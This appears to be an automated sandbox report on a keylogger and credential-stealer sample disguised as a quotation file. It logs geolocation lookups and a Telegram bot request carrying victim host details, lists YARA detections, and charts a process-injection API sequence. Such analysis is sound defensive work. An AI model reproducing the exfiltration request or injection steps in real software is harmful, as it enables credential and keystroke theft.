                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bj0NRzA7jE%2FOSt%2FOOtbIU%2Bj8n%2FDr1%2FRtuLL7s9hfcL8Xx4PFEXklj%2B8jRAUtXxB6K6DlLivuqa4JBvKDKi1QAsOE2Bmrn4Db7%2BnCqj2DgZBPxszBi4p9cPNRwCdYgNlCaL0bF%2Fka"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4c9a7b91c443-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1595&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1781574&cwnd=244&unsent_bytes=0&cid=2e3e719ca08a57aa&ts=164&x=0"
                                                                                                                                                                                              2025-01-10 08:29:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              6192.168.2.449923104.21.80.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:26 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              2025-01-10 08:29:26 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:26 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812555
                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQ9POMVfG1sWBAL1ZRVz090XgsM2Xf34HxhxK7PRHex%2F0KVKWf4MJ%2BbJ%2Bc8B7dUd46b9nTNFdL0xH2B6qEZeT%2FveIvbXC1b0d2EB0KNTeQes2mWxVE8E1cTM0BAG2Z%2FNkMCGPra7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4ca12de342d2-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1546&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1850443&cwnd=229&unsent_bytes=0&cid=df0d985bc9e8653a&ts=142&x=0"
                                                                                                                                                                                              2025-01-10 08:29:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              7192.168.2.449931104.21.80.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2025-01-10 08:29:27 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:27 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812556
                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JhF2Lv3I3Sg55Sr2yu%2Fi%2B8MTRfSfxTJSeztYALThqdAlaoG9TNqI%2Fas7u6raGvcVB4h1Khuhs0i0bGIFfF%2BswB1hUHrMxQqZW0c2640ejUUUJ6OLtzBHfQ5kDkWIMMRRgxjOhdiG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4ca87a9142d2-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1563&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1778319&cwnd=229&unsent_bytes=0&cid=0274dce7e02f55ed&ts=154&x=0"
                                                                                                                                                                                              2025-01-10 08:29:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              8192.168.2.449940104.21.80.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:28 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2025-01-10 08:29:28 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812557
                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kcb%2FdwkHBNzqo7D3Ble8e5j5t3PW8p0yd%2FzmHSpYiqV%2B2q0iGaKFEVgaDtipc%2FIlRohbL4QOncIAUan1%2BJ8HC4XntOjKomh%2FJSFHoCUnYAlxdGOpjwkNOunzK3mMmXfI%2BiQpXJ3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4caf38d243ee-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1749&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1660978&cwnd=228&unsent_bytes=0&cid=75d1c22ba7910172&ts=136&x=0"
                                                                                                                                                                                              2025-01-10 08:29:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              9192.168.2.449946149.154.167.2204437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:29 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2010/01/2025%20/%2014:05:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2025-01-10 08:29:29 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:29 GMT
                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                              2025-01-10 08:29:29 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                                              Statistics

                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:03:28:05
                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                              Path:C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe"
                                                                                                                                                                                              Imagebase:0xcd0000
                                                                                                                                                                                              File size:842'624 bytes
                                                                                                                                                                                              MD5 hash:02BC82A10C674C5C8F60D293E22A544E
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2463896944.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                              Start time:03:28:45
                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                              Imagebase:0x950000
                                                                                                                                                                                              File size:42'064 bytes
                                                                                                                                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:16.6%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                Signature Coverage:5.4%
                                                                                                                                                                                                Total number of Nodes:112
                                                                                                                                                                                                Total number of Limit Nodes:3
                                                                                                                                                                                                execution_graph 54464 80ae498 54465 80ae4e0 VirtualProtectEx 54464->54465 54467 80ae51e 54465->54467 54575 80adcb8 54576 80adcf8 VirtualAllocEx 54575->54576 54578 80add35 54576->54578 54579 80ae738 54580 80ae77d Wow64SetThreadContext 54579->54580 54582 80ae7c5 54580->54582 54583 80aecd8 54584 80aee63 54583->54584 54586 80aecfe 54583->54586 54586->54584 54587 80a6a18 54586->54587 54588 80aef58 PostMessageW 54587->54588 54589 80aefc4 54588->54589 54589->54586 54594 80adff8 54595 80ae040 WriteProcessMemory 54594->54595 54597 80ae097 54595->54597 54598 80a6c79 54599 80a6cbb 54598->54599 54600 80a70e9 54599->54600 54602 80a9690 54599->54602 54603 80a96b7 54602->54603 54604 80a977b 54603->54604 54606 80aba18 54603->54606 54604->54599 54607 80aba97 CreateProcessAsUserW 54606->54607 54609 80abb98 54607->54609 54468 6817598 54469 68175cc 54468->54469 54474 68206d0 54469->54474 54478 68206e0 54469->54478 54471 681ec11 54475 68206d8 54474->54475 54482 6820941 54475->54482 54476 6820734 54476->54471 54479 682070d 54478->54479 54481 6820941 2 API calls 54479->54481 54480 6820734 54480->54471 54481->54480 54483 682092a 54482->54483 54484 682094f 54482->54484 54483->54476 54488 68211c8 54484->54488 54493 68211d8 54484->54493 54485 6820d72 54485->54476 54489 68211cc 54488->54489 54498 68216f0 54489->54498 54502 68216c6 54489->54502 54490 6821638 54490->54485 54494 682120b 54493->54494 54496 68216f0 DeleteFileW 54494->54496 54497 68216c6 DeleteFileW 54494->54497 54495 6821638 54495->54485 54496->54495 54497->54495 54499 682171d DeleteFileW 54498->54499 54501 682176f 54499->54501 54501->54490 54503 68216ef DeleteFileW 54502->54503 54505 682176f 54503->54505 54505->54490 54506 80ae9a0 54507 80ae9e0 ResumeThread 54506->54507 54509 80aea11 54507->54509 54590 80ad5d0 54591 80ad615 Wow64GetThreadContext 54590->54591 54593 80ad65d 54591->54593 54510 80bf020 54511 80bf034 54510->54511 54521 80bf044 54511->54521 54523 682d281 54511->54523 54512 80bf0ad 54521->54512 54528 80a313d 54521->54528 54532 80a3ee7 54521->54532 54536 80a2f57 54521->54536 54540 80a2761 54521->54540 54545 80a27c0 54521->54545 54550 80a2fac 54521->54550 54554 80a265d 54521->54554 54558 80a24ab 54521->54558 54524 682d289 54523->54524 54562 682df03 54524->54562 54566 682df28 54524->54566 54525 682d2a7 54569 80a4408 54528->54569 54572 80a4401 54528->54572 54529 80a3157 54534 80a4408 VirtualProtect 54532->54534 54535 80a4401 VirtualProtect 54532->54535 54533 80a3ef8 54534->54533 54535->54533 54538 80a4408 VirtualProtect 54536->54538 54539 80a4401 VirtualProtect 54536->54539 54537 80a2f6b 54538->54537 54539->54537 54541 80a2756 54540->54541 54541->54540 54543 80a4408 VirtualProtect 54541->54543 54544 80a4401 VirtualProtect 54541->54544 54542 80a27d3 54543->54542 54544->54542 54546 80a27c9 54545->54546 54548 80a4408 VirtualProtect 54546->54548 54549 80a4401 VirtualProtect 54546->54549 54547 80a27d3 54548->54547 54549->54547 54552 80a4408 VirtualProtect 54550->54552 54553 80a4401 VirtualProtect 54550->54553 54551 80a2fea 54552->54551 54553->54551 54556 80a4408 VirtualProtect 54554->54556 54557 80a4401 VirtualProtect 54554->54557 54555 80a2681 54556->54555 54557->54555 54560 80a4408 VirtualProtect 54558->54560 54561 80a4401 VirtualProtect 54558->54561 54559 80a24bc 54560->54559 54561->54559 54563 682df28 VirtualProtect 54562->54563 54565 682dfaa 54563->54565 54565->54525 54567 682df70 VirtualProtect 54566->54567 54568 682dfaa 54567->54568 54568->54525 54570 80a4450 VirtualProtect 54569->54570 54571 80a448a 54570->54571 54571->54529 54573 80a4450 VirtualProtect 54572->54573 54574 80a448a 54573->54574 54574->54529

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 08190013 Relevance: 7.1, Instructions: 7059COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 382 8190013-8190072 384 8190079-819034c 382->384 385 8190074 382->385 416 8192f29-81933a2 384->416 417 8190352-819151a 384->417 385->384 496 81933a8-81948d3 416->496 497 81948d4-8195e39 416->497 840 81919ab-8192f28 417->840 841 8191520-81919aa 417->841 496->497 1095 8195e3f-8196274 497->1095 1096 8196275-8196298 497->1096 840->416 841->840 1095->1096 1100 819629e-8196a94 1096->1100 1101 8196a95-8198072 call 8199643 1096->1101 1100->1101 1510 8198078-8198080 1101->1510
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5a6a92b3cb130716e7f9e3d7785a6524e2cc37f7a51e07e7c65e62a6945c0f51
                                                                                                                                                                                                • Instruction ID: 18cdb04fd5ae5279b06790d5411356095789b55339e620435c113c58f21835d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a6a92b3cb130716e7f9e3d7785a6524e2cc37f7a51e07e7c65e62a6945c0f51
                                                                                                                                                                                                • Instruction Fuzzy Hash: 25F3EF70D05628CBCB64EF29E9886ACBBB1FF46304F4055E9D08CA6254DB315EE9CF46
                                                                                                                                                                                                Function 08190040 Relevance: 7.0, Instructions: 7040COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 1512 8190040-8190072 1513 8190079-819034c 1512->1513 1514 8190074 1512->1514 1545 8192f29-81933a2 1513->1545 1546 8190352-819151a 1513->1546 1514->1513 1625 81933a8-81948d3 1545->1625 1626 81948d4-8195e39 1545->1626 1969 81919ab-8192f28 1546->1969 1970 8191520-81919aa 1546->1970 1625->1626 2224 8195e3f-8196274 1626->2224 2225 8196275-8196298 1626->2225 1969->1545 1970->1969 2224->2225 2229 819629e-8196a94 2225->2229 2230 8196a95-8198072 call 8199643 2225->2230 2229->2230 2639 8198078-8198080 2230->2639
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fa81de169c1bdd39726429fcf2df5ac2b831dcf4b24b6edca784582a10160cde
                                                                                                                                                                                                • Instruction ID: a2289953acf2e9ea85c91e1da1334d98e8e77783c5eee862fcaec2b391c786c3
                                                                                                                                                                                                • Opcode Fuzzy Hash: fa81de169c1bdd39726429fcf2df5ac2b831dcf4b24b6edca784582a10160cde
                                                                                                                                                                                                • Instruction Fuzzy Hash: 36F3EF70D05628CBCB64EF29E9886ACBBB1FF46304F4055E9D08CA6254DB315EE9CF46
                                                                                                                                                                                                Function 06817588 Relevance: 6.6, Instructions: 6577COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 2641 6817588-68175ca 2643 68175d1-681777c 2641->2643 2644 68175cc 2641->2644 2665 6817787-68177b6 2643->2665 2644->2643 2666 68177be-68178e2 2665->2666 2676 68178e9-68178fb 2666->2676 2677 6817903-681ebfa 2676->2677 3661 681ec05 2677->3661 3663 681ec0b call 68206d0 3661->3663 3664 681ec0b call 68206e0 3661->3664 3662 681ec11-681ec19 3663->3662 3664->3662
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
